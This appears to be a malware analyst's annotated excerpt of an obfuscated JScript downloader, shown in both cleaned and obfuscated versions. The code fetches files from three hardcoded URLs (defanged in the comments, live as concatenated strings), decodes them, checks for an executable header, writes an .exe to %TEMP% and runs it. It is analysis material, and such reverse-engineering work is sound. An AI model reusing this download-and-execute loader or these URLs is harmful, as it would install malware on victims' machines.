Vd[0x82] = 0x00E9;
Vd[0x83] = 0x00E2;
Vd[0x84] = 0x00E4;
Vd[0x85] = 0x00E0;
Vd[0x86] = 0x00E5;
Vd[0x87] = 0x00E7;
Vd[0x88] = 0x00EA;
Vd[0x89] = 0x00EB;
Vd[0x8A] = 0x00E8;
Vd[0x8B] = 0x00EF;
Vd[0x8C] = 0x00EE;
Vd[0x8D] = 0x00EC;
Vd[0x8E] = 0x00C4;
Vd[0x8F] = 0x00C5;
Vd[0x90] = 0x00C9;
Vd[0x91] = 0x00E6;
Vd[0x92] = 0x00C6;
Vd[0x93] = 0x00F4;
Vd[0x94] = 0x00F6;
Vd[0x95] = 0x00F2;
Vd[0x96] = 0x00FB;
Vd[0x97] = 0x00F9;
Vd[0x98] = 0x00FF;
Vd[0x99] = 0x00D6;
Vd[0x9A] = 0x00DC;
Vd[0x9B] = 0x00A2;
Vd[0x9C] = 0x00A3;
Vd[0x9D] = 0x00A5;
Vd[0x9E] = 0x20A7;
Vd[0x9F] = 0x0192;
Vd[0xA0] = 0x00E1;
Vd[0xA1] = 0x00ED;
Vd[0xA2] = 0x00F3;
Vd[0xA3] = 0x00FA;
Vd[0xA4] = 0x00F1;
Vd[0xA5] = 0x00D1;
Vd[0xA6] = 0x00AA;
Vd[0xA7] = 0x00BA;
Vd[0xA8] = 0x00BF;
Vd[0xA9] = 0x2310;
Vd[0xAA] = 0x00AC;
Vd[0xAB] = 0x00BD;
Vd[0xAC] = 0x00BC;
Vd[0xAD] = 0x00A1;
Vd[0xAE] = 0x00AB;
Vd[0xAF] = 0x00BB;
Vd[0xB0] = 0x2591;
Vd[0xB1] = 0x2592;
Vd[0xB2] = 0x2593;
Vd[0xB3] = 0x2502;
Vd[0xB4] = 0x2524;
Vd[0xB5] = 0x2561;
Vd[0xB6] = 0x2562;
Vd[0xB7] = 0x2556;
Vd[0xB8] = 0x2555;
Vd[0xB9] = 0x2563;
Vd[0xBA] = 0x2551;
Vd[0xBB] = 0x2557;
Vd[0xBC] = 0x255D;
Vd[0xBD] = 0x255C;
Vd[0xBE] = 0x255B;
Vd[0xBF] = 0x2510;
Vd[0xC0] = 0x2514;
Vd[0xC1] = 0x2534;
Vd[0xC2] = 0x252C;
Vd[0xC3] = 0x251C;
Vd[0xC4] = 0x2500;
Vd[0xC5] = 0x253C;
Vd[0xC6] = 0x255E;
Vd[0xC7] = 0x255F;
Vd[0xC8] = 0x255A;
Vd[0xC9] = 0x2554;
Vd[0xCA] = 0x2569;
Vd[0xCB] = 0x2566;
Vd[0xCC] = 0x2560;
Vd[0xCD] = 0x2550;
Vd[0xCE] = 0x256C;
Vd[0xCF] = 0x2567;
Vd[0xD0] = 0x2568;
Vd[0xD1] = 0x2564;
Vd[0xD2] = 0x2565;
Vd[0xD3] = 0x2559;
Vd[0xD4] = 0x2558;
Vd[0xD5] = 0x2552;
Vd[0xD6] = 0x2553;
Vd[0xD7] = 0x256B;
Vd[0xD8] = 0x256A;
Vd[0xD9] = 0x2518;
Vd[0xDA] = 0x250C;
Vd[0xDB] = 0x2588;
Vd[0xDC] = 0x2584;
Vd[0xDD] = 0x258C;
Vd[0xDE] = 0x2590;
Vd[0xDF] = 0x2580;
Vd[0xE0] = 0x03B1;
Vd[0xE1] = 0x00DF;
Vd[0xE2] = 0x0393;
Vd[0xE3] = 0x03C0;
Vd[0xE4] = 0x03A3;
Vd[0xE5] = 0x03C3;
Vd[0xE6] = 0x00B5;
Vd[0xE7] = 0x03C4;
Vd[0xE8] = 0x03A6;
Vd[0xE9] = 0x0398;
Vd[0xEA] = 0x03A9;
Vd[0xEB] = 0x03B4;
Vd[0xEC] = 0x221E;
Vd[0xED] = 0x03C6;
Vd[0xEE] = 0x03B5;
Vd[0xEF] = 0x2229;
Vd[0xF0] = 0x2261;
Vd[0xF1] = 0x00B1;
Vd[0xF2] = 0x2265;
Vd[0xF3] = 0x2264;
Vd[0xF4] = 0x2320;
Vd[0xF5] = 0x2321;
Vd[0xF6] = 0x00F7;
Vd[0xF7] = 0x2248;
Vd[0xF8] = 0x00B0;
Vd[0xF9] = 0x2219;
Vd[0xFA] = 0x00B7;
Vd[0xFB] = 0x221A;
Vd[0xFC] = 0x207F;
Vd[0xFD] = 0x00B2;
Vd[0xFE] = 0x25A0;
Vd[0xFF] = 0x00A0;
var Ie3 = new Array();
var Nr1 = "";
var OTl4;
var Ha;
for (var KFh4 = 0; KFh4 < WPx8[DXa5(Ep) + Nt]; KFh4++) {
OTl4 = WPx8[KFh4];
if (OTl4 < 128) {
Ha = OTl4;
} else {
Ha = Vd[OTl4];
}
// String["fromCharCode"](Ha)
Ie3.push(String[Gm0 + Qo5 + Ep0(Hc) + Vq1](Ha));
}
// Ie3["join"]("")
Nr1 = Ie3[Fu7]("");
return Nr1;
};
// Writes the byte array WPx8 to the file at path Vd1.
// Mirror image of Nh: the bytes are turned into a string by JSk and written through
// a text-mode ADODB.Stream with Charset "437", so each character lands on disk as
// the original byte. The caller treats an exception from here as fatal and stops.
function STn(Vd1, WPx8) {
// WScript["CreateObject"]("ADODB.Stream")
var Jf8 = WScript[(function Xc3() {
return Es;
}()) + SMd9 + TZu(FTv4) + QAt4](DOf3 + SSp + (function IUx6() {
return XMl;
}()) + NAm + (function FIg1() {
return Zo;
}()));
// type = 2 (text), Charset = "437", then open().
Jf8[VBc(Jl9)] = Sq;
Jf8[Ud + DLj + Lw5] = WKs8;
Jf8[BMy]();
// writeText(JSk(WPx8))
Jf8[ZCq4 + Zn2 + WPe2(IGi)](JSk(WPx8));
// SaveToFile(Vd1, 2): -7130 + 7132 = 2, i.e. overwrite an existing file.
Jf8[ZLe2 + Sg + FAm](Vd1, -7130 + 7132);
// close()
Jf8[Id]();
};
// Analyst's hand-cleaned version of the main loop: the fragment joins are replaced
// by the strings they produce, and ZZr is renamed is_MZ. It is a reading aid, not a
// runnable file - Yr2, Sn, VVq, Nh, Zy and STn are defined only in the full sample.
// Sequence: GET the next URL, save the body to %TEMP%/sioLzkk2X, decode and
// checksum it, require 100-230 KiB and an "MZ" header, write <name>.exe and run it
// with the argument "321".
var ORj1 = 1;
var Vc6 = 0;
do {
try {
if (1 == ORj1) {
if (Vc6 >= VVq["length"]) {
Vc6 = 0;
WScript["Sleep"](1000);
}
// NOTE(review): the cleanup dropped the "]" that closes the VVq[...] index (the
// obfuscated original reads VVq[... % VVq[...]], false), so this line does not
// parse as written.
Yr2["open"]("GET", VVq[Vc6++ % VVq["length"], false);
Yr2["send"]();
}
if (Yr2.readystate < 4) {
WScript["Sleep"](100);
continue;
}
// Save the raw response: binary stream (type 1), overwrite mode (2).
var IUh = WScript["CreateObject"]("ADODB.Stream");
IUh["open"]();
IUh["type"] = 1;
IUh["write"](Yr2["ResponseBody"]);
IUh["position"] = 0;
var filename = Sn.ExpandEnvironmentStrings("%TEMP%/") + "sioLzkk2X";
IUh["SaveToFile"](filename, 2);
IUh["close"]();
// Read back as bytes, then XOR-decode and verify the trailing checksum.
var GHq4 = Nh(filename);
GHq4 = Zy(GHq4);
// Size window and executable-header check; on failure try the next URL.
if (GHq4["length"] < 100 * 1024 || GHq4["length"] > 230 * 1024 || !is_MZ(GHq4)) {
ORj1 = 1;
continue;
}
try {
STn(filename + ".exe" , GHq4);
} catch (e) {
break;
};
// Execution of the dropped file through WScript.Shell.
Sn["Run"](filename + ".exe" + " 321");
break;
} catch (e) {
// 167 * 5 + 165 = 1000 ms back-off before the next attempt.
WScript["Sleep"](167 * 5 + 165);
continue;
};
} while (ORj1);
WScript.Quit(0);
// Analyst's partially decoded URL list: the variable names are replaced by their
// fragment values but the joins are left in place. Concatenated, the three entries
// are the sample's download locations, i.e. its network indicators (defanged):
//   hxxp://BenavidezHoy[.]com/8zrg48k
//   hxxp://aquatixbottle[.]com/ygyngc
//   hxxp://davisdoherty[.]co[.]nz/g0vi70
var VVq = ["ht" + "tp:" + "//Be" + "n" + "avid" + "ezH" + "oy.c" + "o" + "m/" + "8" + "zrg" + "4" + "8k",
"http" + ":/" + "/a" + "qu" + "at" + "ix" + "bot" + "tle." + "co" + "m/" + "y" + "gyn" + "gc",
"ht" + "tp:/" + "/" + "dav" + "isdoh" + "erty" + ".c" + "o." + "n" + "z/g" + "0v" + "i7" + "0"];
// Excerpt of the obfuscated main loop, shown on its own for comparison with the
// cleaned-up version. The fragment variables (Ep, Nt, Zj3, Pp, BMy, HTb, ...), the
// objects Yr2 and Sn, and the helpers Nh, Zy, ZZr and STn are defined in the full
// sample, not in this excerpt.
// ORj1 = -1849 + 1850 = 1 (request flag), Vc6 = 2477 - 2477 = 0 (URL index).
var ORj1 = -1849 + 1850;
var Vc6 = 2477 - 2477;
do {
try {
if (1 == ORj1) {
// Wrap around the URL list with a 1000 ms pause.
if (Vc6 >= VVq[Ep + Nt]) {
Vc6 = 0;
WScript[Zj3 + We0(Pp)](1000);
}
// open("GET", <next URL>, false) and send().
Yr2[BMy](HTb, VVq[Vc6++ % VVq[Ep + (function VSc8() {
return Nt;
}())]], false);
Yr2[Cp + CMj8]();
}
if (Yr2.readystate < 4) {
WScript[Zj3 + Pp](100);
continue;
}
// ADODB.Stream: write ResponseBody in binary mode and SaveToFile(DJt9, Kn5).
var IUh = WScript[Es + Oo(SMd9) + FTv4 + QAt4](DOf3 + SSp + XMl + IVt3(NAm) + Zo);
IUh[BMy]();
IUh[Jl9] = BFz;
IUh[(function Ir6() {
return KFl;
}()) + DLb](Yr2[KOn5 + Ck0 + Wh8 + AZd]);
IUh[Sn0(Il4) + Om7] = 0;
IUh[ZLe2 + Sg + FAm](DJt9, Kn5);
IUh[Id]();
// Read back, decode, verify.
var GHq4 = Nh(DJt9);
GHq4 = Zy(GHq4);
// Size window (100-230 KiB) and "MZ" check.
if (GHq4[Mn0(Ep) + (function NUa() {
return Nt;
}())] < 100 * 1024 || GHq4[(function WGk0() {
return Ep;
}()) + Nt] > 230 * 1024 || !ZZr(GHq4)) {
ORj1 = 1;
continue;
}
try {
STn(Vh9 /* b */ , GHq4);
} catch (e) {
break;
};
// Sn["Run"](Vh9 + " 3" + "21")
Sn[VQv](Vh9 /* b */ + (function Du() {
return RFp1;
}()) + NFc);
break;
} catch (e) {
// 167 * 5 + 165 = 1000 ms back-off.
WScript[Zj3 + Pp](167 * 5 + 165);
continue;
};
} while (ORj1);
WScript.Quit(0);
// Excerpt of the obfuscated URL array, shown on its own for comparison with the
// decoded list. Each element is a chain of fragment variables, immediately-invoked
// function expressions and identity helpers that all just return a fragment; the
// fragments themselves are defined in the full sample. Joined, the three elements
// are (defanged):
//   hxxp://BenavidezHoy[.]com/8zrg48k
//   hxxp://aquatixbottle[.]com/ygyngc
//   hxxp://davisdoherty[.]co[.]nz/g0vi70
var VVq = [Aq5 + OMp7 + (function Pe() {
return XTe8;
}()) + Cz + Aa + Vt + HDq + JBk4 + Fw3 + (function UZh() {
return Kn2;
}()) + (function DZe() {
return CUp;
}()) + WCm1(Tx) + Bk5, Tx0 + (function Zq() {
return Rl5;
}()) + (function GOv() {
return Jx1;
}()) + YJi0(Nv) + VSn + COk + Nr9 + (function Ur2() {
return AFi;
}()) + PUd4 + Uc + (function Ci() {
return KKd1;
}()) + (function PJm6() {
return Iq;
}()) + FWe(MAp7), Aq5 + DOo6(Fl) + (function GYg2() {
return FRt;
}()) + Ex5(UEo6) + LCg6 + WZg(Dz3) + Jw + HUv + Zh + BEi(DNw) + (function YVj() {
return Yf4;
}()) + Az4 + Dw];